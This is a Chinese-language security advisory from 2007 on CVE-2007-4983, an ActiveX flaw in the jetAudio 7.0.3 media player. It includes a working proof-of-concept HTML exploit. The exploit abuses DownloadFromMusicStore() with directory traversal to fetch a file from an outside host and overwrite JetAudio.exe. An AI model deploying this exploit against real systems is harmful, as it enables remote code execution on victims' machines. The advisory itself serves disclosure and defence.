安全研究

安全漏洞
COWON America jetAudio JetFlExt.dll ActiveX控件远程命令执行漏洞

发布日期:2007-09-19
更新日期:2007-09-19

受影响系统:
COWON America jetAudio 7.0.3
描述:
BUGTRAQ  ID: 25723
CVE(CAN) ID: CVE-2007-4983

jetAudio是一种媒体播放器软件。

jetAudio所带的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。

控件的DownloadFromMusicStore()方式处理参数时存在输入验证问题,远程攻击者可能利用目录遍历串访问执行系统中的任意程序。

<*来源:Krystian Kloskowski (h07@interia.pl
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Krystian Kloskowski (h07@interia.pl)提供了如下测试方法:

<HTML>
<!--
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun  ;)
-->

<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>

<script>
var target = "DownloadFromMusicStore";
//>rename evil.exe evil.mp3
var url = "http://192.168.0.1/evil.mp3";
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
var title = "0day";
var artist = "h07";
var album = "for fun";
var genere = "exploit";
var size = 256;
var param1 = 0;
var param2 = 0;
obj[target](url, dst, title, artist, album, genere, size, param1, param2);
</script>
</HTML>

建议:
厂商补丁:

COWON America
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cowonamerica.com/products/jetaudio/

浏览次数:2784
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障